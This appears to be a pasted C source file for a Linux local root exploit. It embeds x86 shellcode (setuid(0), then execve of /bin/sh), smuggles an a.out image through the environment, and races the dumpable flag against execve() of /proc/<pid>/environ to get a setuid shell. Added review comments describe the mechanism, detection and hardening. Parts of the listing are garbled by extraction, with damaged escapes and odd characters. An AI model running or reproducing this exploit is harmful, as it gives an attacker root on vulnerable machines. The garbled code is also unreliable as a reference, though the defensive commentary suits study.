
Untitled

a guest
Oct 16th, 2018
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <fcntl.h>
  6. #include <errno.h>
  7. #include <sched.h>
  8. #include <sys/types.h>
  9. #include <sys/stat.h>
  10. #include <sys/prctl.h>
  11. #include <sys/mman.h>
  12. #include <sys/wait.h>
  13. #include <linux/a.out.h>
  14. #include <asm/unistd.h>
  15.  
  /* a.out header; main() zeroes it, then sets magic, machine type and sizes. */
  16. static struct exec ex;
  /* Environment vector passed to every execve() call in this file. */
  17. static char *e[256];
  /* Argument vector passed to execve(); main() fills slots 0..2. */
  18. static char *a[4];
  /* Staging buffer: main() copies the header and then the __excode bytes into it. */
  19. static char b[512];
  /* Path scratch: the re-exec path in main(), "/proc/<pid>/environ" in exploit(). */
  20. static char t[256];
  /* Points at a shared anonymous page mapped in exploit(); used as a parent-to-child "go" flag. */
  21. static volatile int *c;
  22.  
  /*
   * Top-level inline assembly embedding a small 32-bit x86 Linux payload
   * between the global labels __excode and __excode_e.
   *
   * It makes three int-0x80 system calls: number 23 with ebx = 0
   * (setuid(0) on i386), number 11 (execve) on the embedded "/bin/sh"
   * string with arg[0] pointing at that string, then number 1 (exit).
   * The call/pop pair recovers the payload's own run-time address, so cmd
   * and arg are addressed relative to it rather than by absolute address.
   *
   * Defender note: setuid(0) immediately followed by an exec of /bin/sh is
   * the typical shape of a local privilege-escalation payload. It only has
   * an effect if the kernel has already granted the process a root
   * effective uid.
   *
   * NOTE(review): this listing is extraction-damaged (gutter numbers in the
   * text, escape sequences and numeric prefixes altered) and does not
   * assemble as shown.
   */
  23. /* shell code */
  24. __asm__ (" __excode: call 1f n"
  25. " 1: mov $23, %eax n"
  26. " xor %ebx, %ebx n"
  27. " int $0×80 n"
  28. " pop %eax n"
  29. " mov $cmd-1b, %ebx n"
  30. " add %eax, %ebx n"
  31. " mov $arg-1b, %ecx n"
  32. " add %eax, %ecx n"
  33. " mov %ebx, (%ecx) n"
  34. " mov %ecx, %edx n"
  35. " add $4, %edx n"
  36. " mov $11, %eax n"
  37. " int $0×80 n"
  38. " mov $1, %eax n"
  39. " int $0×80 n"
  40. " arg: .quad 0×00, 0×00 n"
  41. " cmd: .string "/bin/sh" n"
  42. " __excode_e: nop n"
  43. " .global __excode n"
  44. " .global __excode_e n"
  45. );
  46.  
  /*
   * C-visible names for the start and end labels of the assembly payload.
   * main() only takes their addresses: it subtracts them to get the payload
   * length and uses &__excode as the memcpy() source. The declared
   * pointer-to-function type is nominal; the objects are never called or read.
   */
  47. extern void (*__excode) (void);
  48. extern void (*__excode_e) (void);
  49.  
  /*
   * Report a fatal error and terminate the process.
   *
   * err: prefix handed to perror(), which appends the message for the
   *      current errno value.
   *
   * Does not return: stderr is flushed and the process exits with status 1.
   * NOTE(review): main() also routes its usage message through here, where
   * the errno text printed by perror() is unrelated to the condition.
   */
  50. void
  51. error (char *err)
  52. {
  53. perror (err);
  54. fflush (stderr);
  55. exit (1);
  56. }
  57.  
  /*
   * Second stage, reached when the program re-executes itself with three
   * arguments (see main()). Never returns: every path ends in exit().
   *
   * file: path of a file that is mapped in full and later passed to
   *       madvise(); the usage string in main() calls it a "big file" and
   *       the comment below says the purpose is to slow the machine down.
   *
   * What the code does, in order:
   *   - asks for mode 04755 (setuid bit + rwxr-xr-x) on /proc/self/environ;
   *   - creates a zeroed shared page (c) used as a start flag;
   *   - maps `file`, clears the dumpable flag, records "/proc/<pid>/environ"
   *     for the current (pre-fork) pid in t, then forks;
   *   - parent: sets the flag, issues madvise(MADV_WILLNEED) on the mapping
   *     and sets the dumpable flag back to 1;
   *   - child: lowers its priority, spins on the flag, then tries to
   *     execve() the parent's /proc/<pid>/environ.
   *
   * NOTE(review): the dumpable toggle racing against the child's execve()
   * suggests this targets a kernel-side race in how /proc entry permissions
   * are re-evaluated; confirm the affected kernel range against the vendor
   * advisory. Patched kernels are expected to refuse the final execve().
   *
   * Detection: a chmod() on /proc/self/environ and an execve() whose path is
   * /proc/<pid>/environ are not things ordinary software does; both are
   * visible to syscall auditing, as is PR_SET_DUMPABLE being flipped 0 -> 1
   * in quick succession.
   * NOTE(review): mounting /proc with nosuid/noexec is the kind of hardening
   * that would deny the final execve(); verify for the kernel in question.
   */
  58. /* exploit this shit */
  59. void
  60. exploit (char *file)
  61. {
  62. int i, fd;
  63. void *p;
  64. struct stat st;
  65.  
  66. printf ("ntrying to exploit %snn", file);
  67. fflush (stdout);
  /* Request setuid + 0755 on this process's own environ entry; result is not checked. */
  68. chmod ("/proc/self/environ", 04755);
  /* Shared (MAP_SHARED) page so the flag written by the parent is seen by the child. */
  69. c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  70. memset ((void *) c, 0, 4096);
  71.  
  72. /* slow down machine */
  /* open() and fstat() results are unchecked; only the mmap() below is tested. */
  73. fd = open (file, O_RDONLY);
  74. fstat (fd, &st);
  75. p =
  76. (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  77. if (p == MAP_FAILED)
  78. error ("mmap");
  /* Mark the process non-dumpable before forking. */
  79. prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  /* t is built from getpid() before fork(), so it names the parent's /proc entry. */
  80. sprintf (t, "/proc/%d/environ", getpid ());
  81. sched_yield ();
  /* NULL path: this call is expected to fail and return; its result is ignored. */
  82. execve (NULL, a, e);
  83. madvise (0, 0, MADV_WILLNEED);
  84. i = fork ();
  85.  
  86. /* give it a try */
  87. if (i)
  88. {
  /* Parent (also taken when fork() returned -1): release the spinning child. */
  89. (*c)++;
  /* GNU "?:" form: error("madvise") runs only when madvise() returns non-zero. */
  90. !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
  /* Flip the dumpable flag back while the child is heading for its execve(). */
  91. prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
  92. sched_yield ();
  93. }
  94. else
  95. {
  /* Child: lower priority, busy-wait until the parent sets *c, then exec. */
  96. nice(10);
  97. while (!(*c));
  98. sched_yield ();
  /* Executes the parent's environ entry, with e as the new environment. */
  99. execve (t, a, e);
  /* Reached only if execve() returned, i.e. the kernel refused it. */
  100. error ("failed");
  101. }
  102.  
  103. waitpid (i, NULL, 0);
  104. exit (0);
  105. }
  106.  
  /*
   * Entry point with two modes, selected by argument count.
   *
   *   ac == 2 (first run): builds an a.out image (header + __excode bytes)
   *     in b, splits that image at its NUL bytes into the environment
   *     vector e, and re-executes this same binary with argv
   *     { av[0], av[0], av[1] } and that environment.
   *   ac > 2 (the re-executed copy): calls exploit(av[2]), which does not
   *     return. av[2] here is the file name given as av[1] on the first run.
   *
   * Because each environment string ends in a NUL, handing the pieces over
   * as envp makes the new process's environment area carry the same byte
   * sequence as b. That is what /proc/<pid>/environ then exposes.
   *
   * Returns 0 nominally; in practice every path ends in execve() or exit().
   *
   * NOTE(review): av[1] is passed to strdup() before the ac < 2 check, so
   * running with no argument dereferences a NULL pointer ahead of the usage
   * message. getcwd()/strcat() into t[256] are not length-checked.
   */
  107. int
  108. main (int ac, char **av)
  109. {
  110. int i, j, k, s;
  111. char *p;
  112.  
  113. memset (e, 0, sizeof (e));
  114. memset (a, 0, sizeof (a));
  /* argv for the re-exec: three entries, so the new copy sees ac == 3. */
  115. a[0] = strdup (av[0]);
  116. a[1] = strdup (av[0]);
  117. a[2] = strdup (av[1]);
  118.  
  119. if (ac < 2)
  120. error ("usage: binary <big file name>");
  /* Second-stage path; exploit() exits and never comes back here. */
  121. if (ac > 2)
  122. exploit (av[2]);
  123. printf ("npreparing");
  124. fflush (stdout);
  125.  
  126. /* make setuid a.out */
  /* Header fields: NMAGIC image for machine type M_386. */
  127. memset (&ex, 0, sizeof (ex));
  128. N_SET_MAGIC (ex, NMAGIC);
  129. N_SET_MACHTYPE (ex, M_386);
  /* s = payload length, from the addresses of the two assembly labels. */
  130. s = ((unsigned) &__excode_e) – (unsigned) &__excode;
  131. ex.a_text = s;
  /* a_syms is set to the negated total image size (header + payload). */
  132. ex.a_syms = -(s + sizeof (ex));
  133.  
  /* Lay out the image in b: header first, payload bytes right after it. */
  134. memset (b, 0, sizeof (b));
  135. memcpy (b, &ex, sizeof (ex));
  136. memcpy (b + sizeof (ex), &__excode, s);
  137.  
  138. /* make environment */
  139. p = b;
  /* From here on s is the total image length, not just the payload. */
  140. s += sizeof (ex);
  141. j = 0;
  /* Each NUL byte ends one environment string; k marks the start of the next. */
  142. for (i = k = 0; i < s; i++)
  143. {
  144. if (!p[i])
  145. {
  146. e[j++] = &p[k];
  147. k = i + 1;
  148. }
  149. }
  150.  
  151. /* reexec */
  /* Path is cwd + "/" + av[0], so av[0] is assumed to be relative to the cwd. */
  152. getcwd (t, sizeof (t));
  153. strcat (t, "/");
  154. strcat (t, av[0]);
  155. execve (t, a, e);
  /* Reached only if the re-exec failed. */
  156. error ("execve");
  157. return 0;
  158. }